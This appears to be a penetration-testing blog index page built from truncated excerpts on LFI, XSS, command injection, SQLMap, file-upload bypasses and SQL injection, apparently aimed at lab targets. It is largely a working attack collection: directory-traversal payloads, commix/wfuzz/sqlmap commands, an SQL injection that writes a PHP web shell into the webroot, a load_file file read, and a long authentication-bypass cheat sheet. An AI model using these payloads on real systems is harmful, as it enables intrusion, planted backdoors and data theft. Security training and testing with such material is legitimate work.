So this post is basically about why it is important to use Kerberos instead of NTLM and use SMB Signing as well. NTLM Relaying is a common man-in-the-middle attack with a high success-rate. SMB and NTLM Relaying is dangerous, as
Local File Inclusion (LFI)
Scripts that takes filenames as parameters without sanitizing the user input is typically good candidates for LFI vulnerabilities. For example, a PHP script : foo.php?file=image2.jpg An attacker would replace image2.jpg with a directory traversel payload: foo.php?file=../../../../../../../etc/passwd Or other sensitive files
Java Signed Applet Attack
Java Signed Applet Attack is a Client Side exploit and is based on a human vulnerability as opposted to software vulnerability. This attack affects targets with Java installed and enabled in their browsers. In this example we create a malicious
XSS – Cross Site Scripting
BeeF Framework BeeF is native in Kali and is a browser exploitation framework. From the vulnerable website insert below javascript to connect to BeeF hook on attack host. As XSS is a Client Side attack, most useful on persistent /
Command Injection – Tools and methods
Below is a list of common tools and methods to test for command injection. Commix
|
1 2 |
commix -r /home/workdir/email.req –auth-cred=admin:password –all –batch –level 3 |
wfuzz
|
1 2 |
wfuzz -c -z file,/usr/share/wordlists/fuzzdb/attack/os-cmd-execution/Commands-Linux.txt,base64 -b “PHPSESSID=077dn044qmuh2ut41tksedvlv2” -d “check=FUZZ” http://10.10.10.105/diag.php |
curl
|
1 2 3 |
# opt Param vuln to RCE: curl -v “http:/10.10.10.69/sync?opt=’ id’” |
SMB Following could be used to achieve command execution and pop a reverse shell via poorly configured SMB.
|
1 2 |
smbclient //10.10.10.3/tmp |
SQLMap
SQLMap is a tool that can be used to automate scanning and exploiting of SQL Injection. Below is some examples using SQLMap.
|
1 2 |
sqlmap -u “http://10.10.10.63/?id=” -a |
In below examle the scan is based on login.req which is the HTTP captured and exported from
SQL Injection – RCE and LFI Methods
Upload PHP Command Injection Following can be used to get RCE / Command Execution when target is vulnerable to SQLi.
|
1 2 |
union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php' |
Load File via SQLi Following can be used to read files from target.
|
1 2 |
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6 |
Bypassing File Upload Restrictions
Common techniques to bypass File upload restrictions on web sites. Change the Content-Type parameter in the request header using Burp, ZAP etc. Put server executable extensions like file.php5, file.shtml, file.asa, file.cert Changing letters to capital form file.aSp or file.PHp3 Using
Bypassing Authentication with SQLi
SQL Injection – Authentication Bypass Cheatsheet
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 |
' or 1=1 LIMIT 1 -- ' or 1=1 LIMIT 1 -- - ' or 1=1 LIMIT 1# 'or 1# ' or 1=1 -- ' or 1=1 -- - or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or ‘1'='1 admin' or ‘1'='1'-- admin' or ‘1'='1'# admin' or ‘1'='1'/* admin'or 1=1 or ‘'=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or (‘1'='1 admin') or (‘1'='1'-- admin') or (‘1'='1'# admin') or (‘1'='1'/* admin') or ‘1'='1 admin') or ‘1'='1'-- admin') or ‘1'='1'# admin') or ‘1'='1'/* 1234 ‘ AND 1=0 UNION ALL SELECT ‘admin', ‘81dc9bdb52d04dc20036dbd8313ed055 admin' -- admin' # admin'/* admin' or “1'='1 admin' or “1'='1'-- admin' or “1'='1'# admin' or “1'='1'/* admin'or 1=1 or “'=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or (“1'='1 admin') or (“1'='1'-- admin') or (“1'='1'# admin') or (“1'='1'/* admin') or “1'='1 admin') or “1'='1'-- admin') or “1'='1'# admin') or “1'='1'/* 1234 “ AND 1=0 UNION ALL SELECT “admin', “81dc9bdb52d04dc20036dbd8313ed055 |